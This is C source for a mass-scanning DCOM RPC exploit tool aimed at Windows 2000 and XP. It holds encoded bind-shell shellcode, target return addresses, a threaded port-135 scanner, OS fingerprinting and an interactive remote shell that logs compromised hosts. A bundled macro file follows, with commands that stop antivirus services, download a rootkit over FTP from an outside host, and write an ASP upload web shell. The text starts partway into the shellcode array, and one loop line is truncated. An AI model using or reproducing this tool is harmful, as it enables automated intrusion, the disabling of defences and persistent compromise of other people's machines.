"\x00\x00\x00\x00\x03\x00\x00\x00\x46\x00\x58\x00\x00\x00\x00\x00" "\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x10\x00\x00\x00\x30\x00\x2e\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x68\x00\x00\x00\x0e\x00\xff\xff" "\x68\x8b\x0b\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x86\x01\x00\x00\x00\x00\x00\x00\x86\x01\x00\x00\x5c\x00\x5c\x00" "\x46\x00\x58\x00\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00" "\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00\x46\x00\x58\x00" "\x46\x00\x58\x00\x9f\x75\x18\x00\xcc\xe0\xfd\x7f\xcc\xe0\xfd\x7f" 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff" "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2" "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80" "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09" "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6" "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf" "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad" "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81" "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81" "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80" "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80" "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80" "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80" "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80" "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81" "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6" "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\x40\xa1\x1f\x4c\xd5\x24\xc5\xd3" "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50" "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4" 
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4" "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4" "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f" "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b" "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80" "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89" "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80" "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83" "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83" "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78" "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c" "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b" "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04\x00\x5c\x00\x43\x00" "\x24\x00\x5c\x00\x31\x00\x32\x00\x33\x00\x34\x00\x35\x00\x36\x00" "\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00" "\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x2e\x00" "\x64\x00\x6f\x00\x63\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc" "\x20\x00\x00\x00\x30\x00\x2d\x00\x00\x00\x00\x00\x88\x2a\x0c\x00" "\x02\x00\x00\x00\x01\x00\x00\x00\x28\x8c\x0c\x00\x01\x00\x00\x00" "\x07\x00\x00\x00\x00\x00\x00\x00";
struct { char *os; u_long ret; } targets[] =
{
 { "[Win2k]", 0x0018759F },
 { "[WinXP]", 0x0100139d },
};
//GLOBALS...
/***************/
void banner(void)
{
 printf ("_______________ \n");
 printf(" KAHT II - MASSIVE RPC EXPLOIT\n");
 printf(" DCOM RPC exploit. Modified by [email protected]\n");
 printf(" #haxorcitos && #localhost @Efnet Ownz you!!!\n");
 printf ("______________\n\n");
}
void usage(void)
{
 printf(" Usage: KaHt2.exe IP1 IP2 [THREADS] [AH]\n");
 printf(" example: KaHt2.exe 192.168.0.0 192.168.255.255\n");
 printf("\n NEW!: Macros Available in shell enviroment!!\n Type !! for more info into a shell.\n");
 //printf(" If AUTOHACKING ENABLED MACRO !9 WILL BE EXECUTED\n");
 exit(1);
}
/***************/
/**************/
void execute_macro(char opt,int sock2){
 FILE *macro;
 char cadena[512];
 char tmp[512];
 int found=0;
 int delay=500; //configurable TIMEOUT FOR CMDS - Default=500
 if ((macro=fopen("macros.txt","r")) !=NULL)
 {
  while (!feof(macro))
  {
   memset(cadena,'\0',sizeof(cadena));
   fgets(cadena,sizeof(cadena)-1,macro);
   cadena[strlen(cadena)-1]='\0';
   if ((found==1) && (( strncmp(cadena,"[Macro]",strlen("[Macro]"))) ==0) )
   { fclose(macro); printf(" + Ejecucion de La Macro Terminada\n"); fclose(macro);return;}
   if (( strncmp(cadena,"delay=",strlen("delay="))) ==0) delay=atoi(cadena+6);
   if (( strncmp(cadena,"key=",strlen("key="))) ==0)
    if (( cadena+strlen("key=!"))[0]==opt) found=1; //OUR CMDS ARE HERE!
   if ( (( strncmp(cadena,"cmd=",strlen("cmd="))) ==0) && (found) )
    if (strlen(cadena)>strlen("cmd= "))
    {
     strcpy(tmp,cadena+4);
     strcat(tmp,"\r\n");
     send(sock2,tmp,strlen(tmp),0);
     //printf("Enviado: %s! de tamaсo: %i\n",tmp,sizeof(tmp));
     sleep(delay);
    }
  }
  fclose(macro);
  send(sock2,"\n",strlen("\n"),0);
  printf(" - Macro Done -\n");
 }
 sleep(25);
}
/**************/
void show_macros(int sock2){
 FILE *macro;
 char cadena[512];
 printf(" +______________(Available Macros)______________\n");
 if ((macro=fopen("macros.txt","r")) !=NULL)
 {
  while (!feof(macro))
  {
   memset(cadena,'\0',512);
   fgets(cadena,sizeof(cadena)-1,macro);
   if (strlen(cadena)>1)
   {
    cadena[strlen(cadena)-1]='\0';
    if (( strncmp(cadena,"name=",strlen("name="))) ==0) printf(" + Nombre: %s ",cadena+strlen("name="));
    if ((strncmp(cadena,"key=",strlen("key="))) ==0) printf("Trigger: %s\n",cadena+strlen("key="));
   }
  }
  fclose(macro);
 }
 send(sock2,"\n",strlen("\n"),0);
 sleep(10);
}
/**************/
void macro(char opt, int sock2)
{
 switch(opt)
 {
  case '!': show_macros(sock2); break;
  default: execute_macro(opt,sock2); break;
 }
}
/**************/
void readconsole(void *sock2)
{
 int l;
 char buf[512];
 /*if (AUTOHACKING) { execute_macro('9',(int) sock2); salir=1; } */
 while(!salir)
 {
  l = read (0, buf, sizeof (buf));
  if (l <= 0) salir=1;
  else
  {
   if ( (l==3) && (buf[0]=='!') ) macro(buf[1],(int)sock2);
   else
   {
    send((int)sock2,buf,l,0);
    if (strncmp(buf,"exit",strlen("exit")) ==0) { salir=1; _endthread(); }
   }
  }
 }
}
void enviamacro(void *sock2)
{
 sleep(500);
 macro(9,(int)sock2);
 salir=1;
 _endthread();
}
/*************/
int shell (int sock2) /* NOT RIPPED FROM TESO */
{
 int l;
 char buf[512];
 salir=0;
 _beginthread(readconsole,4096,(void *)(int) sock2);
 while (!salir)
 {
  if ((l=recv (sock2, buf, sizeof (buf),0))>0) write (1, buf, l);
  else sleep(100);
 }
 printf("\n - Connection Closed\n");
 return (salir);
}
/**************/
int main(int argc, char **argv)
{
 int i,total=NTHREADS;
#ifdef WIN32
 WSADATA ws;
 clrscr();
#endif
 banner();
 if(argc<3) usage();
#ifdef WIN32
 if (WSAStartup(MAKEWORD(2,0),&ws)!=0) { printf(" WSAStartup Error: %d\n",WSAGetLastError()); exit(1); }
#endif
 sscanf (argv[1], "%d.%d.%d.%d", &ip1[0],&ip1[1],&ip1[2],&ip1[3]);
 sscanf (argv[2], "%d.%d.%d.%d", &ip2[0],&ip2[1],&ip2[2],&ip2[3]);
 for(i=0;i<4;i++)
 {
  if ( (ip1[i]>255) || (ip1[i]<0) ) usage();
  if ( (ip2[i]>255) || (ip2[i]<0) ) usage();
 }
 if (argc==4) total=atoi(argv[3]);
 // if (argc==5) AUTOHACKING=atoi(argv[4]);
#ifdef WIN32
 InitializeCriticalSection(&cs);
 InitializeCriticalSection(&css);
 InitializeCriticalSection(&cslog);
 InitializeCriticalSection(&csshell);
#else
 //Put the Linux threads and semaphores here
#endif
 //ULTRA FAST PORT SCANNER....
 if ((results=fopen("results.txt","w"))==NULL) exit(0);
 printf(" [+] Targets: %s-%s with %i Threads\n",argv[1],argv[2],total);
 srand ( time(NULL) );
 RPORT=INITRPORT;
 printf(" [+] Attacking Port: %i. Remote Shell at port: %i\n",PORT,RPORT);
 printf(" [+] Scan In Progress...\n");
 for(i=0;i
#ifdef WIN32
  _beginthread(checkea,8192,(void *)i);
#else
  //Put the Linux threads and semaphores here
#endif
 while(threads>0) sleep(100);
 fclose(results);
 printf("\n [+] Scan Finished. Found %i open ports\n",rpcopen);
 return(0);
}
/********************/
//void attack(char *linea,int peta)
void attack(char *linea,int peta)
{
 if (peta==-1) return;
 // if (AUTOHACKING!=1)
#ifdef WIN32
 struct timeval tv;
#else
 struct time_t tv;
#endif
 struct sockaddr_in target_ip;
 int sock,sock2; //Exploit Socket && Shell Socket
 unsigned short port = 135;
 unsigned short lportl=666; /* drg */
 char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */
 unsigned char buf1[0x1000];
 u_long tmp=1;
 //TIMEOUTS
 FILE *w2k;
 FILE *wxp;
 int i;
 fd_set fds;
 EnterCriticalSection(&csshell);
 target_ip.sin_family = AF_INET;
 target_ip.sin_addr.s_addr = inet_addr(linea);
 target_ip.sin_port = htons(port);
 if ((sock=socket(AF_INET,SOCK_STREAM,0)) != -1)
 {
  printf(" - Connecting to %s\n",linea);
  tmp=1;
  ioctlsocket( sock, FIONBIO, &tmp);
  tv.tv_sec = CONNECT;
  tv.tv_usec = 0;
  FD_ZERO(&fds);
  FD_SET(sock, &fds);
  connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip));
  //if((i=select(sock+1,0,&fds,0,&tv))!=SOCKET_ERROR)
  // if (i!=0)
  if((i=select(sock+1,0,&fds,0,&tv))>0)
  {
   printf(" Sending Exploit to a %s Server...",targets[peta].os);
   tmp=0;
   ioctlsocket( sock, FIONBIO, &tmp);
   if (send(sock,bindstr,sizeof(bindstr),0)>0)
   {
    tmp=1;
    ioctlsocket( sock, FIONBIO, &tmp);
    tv.tv_sec = RECV;
    tv.tv_usec = 0;
    FD_ZERO(&fds);
    FD_SET(sock, &fds);
    if(select(sock +1, &fds, NULL, NULL, &tv) > 0)
    {
     recv(sock, buf1, 1000, 0);
     lportl=htons(RPORT);
     memcpy(&lport[1], &lportl, 2);
     *(long*)lport = *(long*)lport ^ 0x9432BF80;
     memcpy(&winshellcode[1351],&lport,4);
     memcpy(winshellcode+916, (unsigned char *) &targets[peta].ret, 4);
     tmp=0;
     ioctlsocket( sock, FIONBIO, &tmp);
     send(sock,winshellcode,1705,0);
     sleep(50);
     if ((sock2=socket(AF_INET,SOCK_STREAM,0)) !=-1)
     {
      target_ip.sin_family = AF_INET;
      target_ip.sin_addr.s_addr = inet_addr(linea);
      target_ip.sin_port = htons(RPORT);
      tmp=1;
      ioctlsocket( sock2, FIONBIO, &tmp);
      tv.tv_sec = CONNECT;
      tv.tv_usec = 0;
      FD_ZERO(&fds);
      FD_SET(sock2, &fds);
      connect(sock2,(struct sockaddr *)&target_ip, sizeof(target_ip));
      if((i=select(sock+1,0,&fds,0,&tv))>0)
      {
       printf("\n - Conectando con la Shell Remota...\n\n");
       salir=0;
       shell(sock2);
#ifdef WIN32
       closesocket(sock2);
#else
       close(sock2);
#endif
       strcat(linea,"\n");
       if (peta==0)
       {
        w2k=fopen("win2k.txt","a");
        if (w2k!=NULL) { fputs(linea,w2k); fclose(w2k);}
        else printf(" !!UNABLE TO LOG IP %s",linea);
       }
       else
       {
        wxp=fopen("winxp.txt","a");
        if (wxp!=NULL) {fputs(linea,wxp); fclose(wxp);}
        else printf(" !!UNABLE TO LOG IP %s",linea);
       }
      //} else printf("UNABLE TO CONNECT TO SHELL\n");
      }
      else printf("FAILED\n");
     }
     else printf("\n UNABLE TO CREATE SOCK2\n");
    }
    else printf(" FAILED to send Exploit2\n");
   }
   else printf(" FAILED to send Exploit\n");
  }
 } //if (AUTOHACKING!=1)
 LeaveCriticalSection(&csshell);
}
/*****************/
char *givemeip(char *ip)
{
 EnterCriticalSection(&cs);
 if (ip1[3]!=254) ip1[3]++;
 else { return(NULL); //uhh kiddiss!
 }
 if (ip1[2]==255) { ip1[2]++; ip1[1]++;}
 LeaveCriticalSection(&cs);
 if (ip1[2]>ip2[2]) return(NULL);
 if (ip1[2]==ip2[2]) if (ip1[3]>ip2[3]) return(NULL);
 sprintf(ip,"%d.%d.%d.%d",ip1[0],ip1[1],ip1[2],ip1[3]);
 return(ip);
}
/*****************/
//int version(char *ip, int sock)
int version(char ip[16], int sock)
{ //a bit of ettercap...
unsigned char peer0_0[] = { 0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18, 0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11, 0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00, 0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41, 0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97, 0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0, 0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00 };
unsigned char peer0_1[] = { 0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00, 0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20, 0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53, 0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00, 0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11, 0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb, 0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00, 0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00, 0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00, 0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00, 0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00 };
/*
unsigned char win2kvuln[] = { 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00};
*/
 fd_set fds2;
 unsigned char buf[1024];
 int l;
 struct timeval tv2;
 FD_ZERO(&fds2);
 FD_SET(sock, &fds2);
 tv2.tv_sec = RPC_FINGERPRINT_TIMEOUT;
 tv2.tv_usec = 0;
 memset(buf,'\0',sizeof(buf));
 send(sock,peer0_0,sizeof(peer0_0),0);
 if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
 {
  l=recv (sock, buf, sizeof (buf),0);
  // for(i=0;i<52;i++)
  // {
  // if (i==28) i=i+4;
  // if (buf[i+32]!=win2kvuln[i])
  // {
  send(sock,peer0_1,sizeof(peer0_1),0);
  if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
  {
   memset(buf,'\0',sizeof(buf));
   l=recv (sock, buf, sizeof (buf),0);
   if (l==32)
   {
    closesocket(sock);
    return(1);//winxp
   }
   else
   {
#ifdef WIN32
    closesocket(sock);
#else
    close(sock);
#endif
    return(0);//win2kby default. Nt4 not added..
   }
  }
  else return(-1);
  // }
  //}
  // closesocket(sock);
  // return(0);//win2k
 }
 closesocket(sock);
 return(-1); //Unknown
}
/****************/
void checkea(void *threadn)
{
 char ip[16];
 char ip2[17];
 int sock,i;
 struct sockaddr_in target_ip;
 fd_set fds;
 u_long tmp=1;
 struct timeval tv;
 EnterCriticalSection(&css);
 threads++;
 sleep(1);
 LeaveCriticalSection(&css);
 memset(ip,'\0',sizeof(ip));
 while (givemeip(ip)!=NULL)
 {
  //printf("Checkeando IP: %s\n",ip);
  target_ip.sin_family = AF_INET;
  target_ip.sin_addr.s_addr = inet_addr(ip);
  target_ip.sin_port = htons(135);
  closesocket(sock);
  if ((sock=socket(AF_INET,SOCK_STREAM,0)) != -1)
  {
   tmp=1;
   ioctlsocket( sock, FIONBIO, &tmp);
   tv.tv_sec = CONNECT;
   tv.tv_usec = 0;
   FD_ZERO(&fds);
   FD_SET(sock, &fds);
   connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip));
   if((i=select(sock+1,0,&fds,0,&tv))>0)
   {
    sprintf(ip2,"%s\n",ip);
    EnterCriticalSection(&cslog);
    fputs(ip2,results);
    rpcopen++;
    LeaveCriticalSection(&cslog);
    attack(ip,version(ip,sock));
   }
  }
  closesocket(sock);
  memset(ip,'\0',sizeof(ip));
 }
 EnterCriticalSection(&css);
 threads--;
 sleep(1);
 LeaveCriticalSection(&css);
 //printf("Thread %i saliendo\n",(int)threadn);
 _endthread();
}
/*****************/
And here is also the macros.txt file (it came bundled; apparently it's just a help file for the exploit)
[Macro]
name=kill_avs
key=!1
delay=500
cmd=net stop Mcshield
cmd=net stop "Norton Antivirus Service"
cmd=net stop "Panda Antivirus"
cmd=net stop "ZoneAlarm"
cmd=net stop "Detector de OfficeScanNT"
cmd=net stop "McAfee Framework Service"

[Macro]
name=upload_FTP
key=!2
delay=500
cmd=echo open xx.xx.xx.xx 1212>a
cmd=echo ftp>>a
cmd=echo ftp>>a
cmd=echo bin>>a
cmd=echo get hxdef.exe>>a
cmd=echo get hxdef.ini>>a
cmd=echo bye>>a
cmd=start ftp -s:a

[Macro]
name=Upload_tftp
key=!3
delay=500
cmd=tftp -i blablablabla
cmd=tftp -i blablablabla
cmd=tftp -i blablablabla

[Macro]
name=Upload_ASP
key=!4
delay=500
cmd=echo ^^^upload.asp^^^ >upload.asp
cmd=echo ^ >>upload.asp
cmd=echo ^ >>upload.asp
cmd=echo ^^ >>upload.asp
cmd=echo ^<!--#INCLUDE FILE="upload.inc"--^> >>upload.asp
cmd=echo ^<% >>upload.asp
cmd=echo If Request.ServerVariables("REQUEST_METHOD") = "POST" Then >>upload.asp
cmd=echo Set Fields = GetUpload() >>upload.asp
cmd=echo FilePath = Server.MapPath(".") ^& "\" ^& Fields("File1").FileName >>upload.asp
cmd=echo Fields("File1").Value.SaveAs FilePath >>upload.asp
cmd=echo End If >>upload.asp
cmd=echo %%^> >>upload.asp
cmd=@echo UPLOAD.ASP SUCCESSFULLY SENT. NOW SENDING UPLOAD.INC
cmd=@echo ^<script RUNAT=SERVER LANGUAGE=VBSCRIPT^> >>upload.inc
cmd=@echo Const IncludeType = 2 >>upload.inc
cmd=@echo Dim UploadSizeLimit >>upload.inc
cmd=@echo Function GetUpload() >>upload.inc
cmd=@echo Dim Result >>upload.inc
cmd=@echo Set Result = Nothing >>upload.inc
cmd=@echo If Request.ServerVariables("REQUEST_METHOD") = "POST" Then >>upload.inc
cmd=@echo Dim CT, PosB, Boundary, Length, PosE >>upload.inc
cmd=@echo CT = Request.ServerVariables("HTTP_Content_Type") >>upload.inc
cmd=@echo If LCase(Left(CT, 19)) = "multipart/form-data" Then >>upload.inc
cmd=@echo PosB = InStr(LCase(CT), "boundary=") >>upload.inc
cmd=@echo If PosB ^> 0 Then Boundary = Mid(CT, PosB + 9) >>upload.inc
cmd=@echo PosB = InStr(LCase(CT), "boundary=") >>upload.inc
cmd=@echo If PosB ^> 0 then >>upload.inc
cmd=@echo PosB = InStr(Boundary, ",") >>upload.inc
cmd=@echo If PosB ^> 0 Then Boundary = Left(Boundary, PosB - 1) >>upload.inc
cmd=@echo end if >>upload.inc
cmd=@echo Length = CLng(Request.ServerVariables("HTTP_Content_Length")) >>upload.inc
cmd=@echo If "" ^& UploadSizeLimit ^<^> "" Then >>upload.inc
cmd=@echo UploadSizeLimit = CLng(UploadSizeLimit) >>upload.inc
cmd=@echo If Length ^> UploadSizeLimit Then >>upload.inc
cmd=@echo Request.BinaryRead (Length) >>upload.inc
cmd=@echo Err.Raise 2, "GetUpload", "Upload size " ^& FormatNumber(Length, 0) ^& "B exceeds limit of " ^& FormatNumber(UploadSizeLimit, 0) ^& "B" >>upload.inc
cmd=@echo Exit Function >>upload.inc
cmd=@echo End If >>upload.inc
cmd=@echo End If >>upload.inc
cmd=@echo If Length ^> 0 And Boundary ^<^> "" Then >>upload.inc
cmd=@echo Boundary = "--" ^& Boundary >>upload.inc
cmd=@echo Dim Head, Binary >>upload.inc
cmd=@echo Binary = Request.BinaryRead(Length) >>upload.inc
cmd=@echo Set Result = SeparateFields(Binary, Boundary) >>upload.inc
cmd=@echo Binary = Empty >>upload.inc
cmd=@echo Else >>upload.inc
cmd=@echo Err.Raise 10, "GetUpload", "Zero length request ." >>upload.inc
cmd=@echo End If >>upload.inc
cmd=@echo Else >>upload.inc
cmd=@echo Err.Raise 11, "GetUpload", "No file sent." >>upload.inc
cmd=@echo End If >>upload.inc
cmd=@echo Else >>upload.inc
cmd=@echo Err.Raise 1, "GetUpload", "Bad request method." >>upload.inc
cmd=@echo End If >>upload.inc
cmd=@echo Set GetUpload = Result >>upload.inc
cmd=@echo End Function >>upload.inc
cmd=@echo Function SeparateFields(Binary, Boundary) >>upload.inc
cmd=@echo Dim PosOpenBoundary, PosCloseBoundary, PosEndOfHeader, isLastBoundary >>upload.inc
cmd=@echo Dim Fields >>upload.inc
cmd=@echo Boundary = StringToBinary(Boundary) >>upload.inc
cmd=@echo PosOpenBoundary = InStrB(Binary, Boundary) >>upload.inc
cmd=@echo PosCloseBoundary = InStrB(PosOpenBoundary + LenB(Boundary), Binary, Boundary, 0) >>upload.inc
cmd=@echo Set Fields = CreateObject("Scripting.Dictionary") >>upload.inc
cmd=@echo Do While (PosOpenBoundary ^> 0 And PosCloseBoundary ^> 0 And Not isLastBoundary) >>upload.inc
cmd=@echo Dim HeaderContent, FieldContent, bFieldContent >>upload.inc
cmd=@echo Dim Content_Disposition, FormFieldName, SourceFileName, Content_Type >>upload.inc
cmd=@echo Dim Field, TwoCharsAfterEndBoundary >>upload.inc
cmd=@echo PosEndOfHeader = InStrB(PosOpenBoundary + Len(Boundary), Binary, StringToBinary(vbCrLf + vbCrLf)) >>upload.inc
cmd=@echo HeaderContent = MidB(Binary, PosOpenBoundary + LenB(Boundary) + 2, PosEndOfHeader - PosOpenBoundary - LenB(Boundary) - 2) >>upload.inc
cmd=@echo bFieldContent = MidB(Binary, (PosEndOfHeader + 4), PosCloseBoundary - (PosEndOfHeader + 4) - 2) >>upload.inc
cmd=@echo GetHeadFields BinaryToString(HeaderContent), Content_Disposition, FormFieldName, SourceFileName, Content_Type >>upload.inc
cmd=@echo Set Field = CreateUploadField() >>upload.inc
cmd=@echo Set FieldContent = CreateBinaryData() >>upload.inc
cmd=@echo FieldContent.ByteArray = bFieldContent >>upload.inc
cmd=@echo FieldContent.Length = LenB(bFieldContent) >>upload.inc
cmd=@echo Field.Name = FormFieldName >>upload.inc
cmd=@echo Field.ContentDisposition = Content_Disposition >>upload.inc
cmd=@echo Field.FilePath = SourceFileName >>upload.inc
cmd=@echo Field.FileName = GetFileName(SourceFileName) >>upload.inc
cmd=@echo Field.ContentType = Content_Type >>upload.inc
cmd=@echo Field.Length = FieldContent.Length >>upload.inc
cmd=@echo Set Field.Value = FieldContent >>upload.inc
cmd=@echo Fields.Add FormFieldName, Field >>upload.inc
cmd=@echo TwoCharsAfterEndBoundary = BinaryToString(MidB(Binary, PosCloseBoundary + LenB(Boundary), 2)) >>upload.inc
cmd=@echo isLastBoundary = TwoCharsAfterEndBoundary = "--" >>upload.inc
cmd=@echo If Not isLastBoundary Then >>upload.inc
cmd=@echo PosOpenBoundary = PosCloseBoundary >>upload.inc
cmd=@echo PosCloseBoundary = InStrB(PosOpenBoundary + LenB(Boundary), Binary, Boundary) >>upload.inc
cmd=@echo End If >>upload.inc
cmd=@echo Loop >>upload.inc
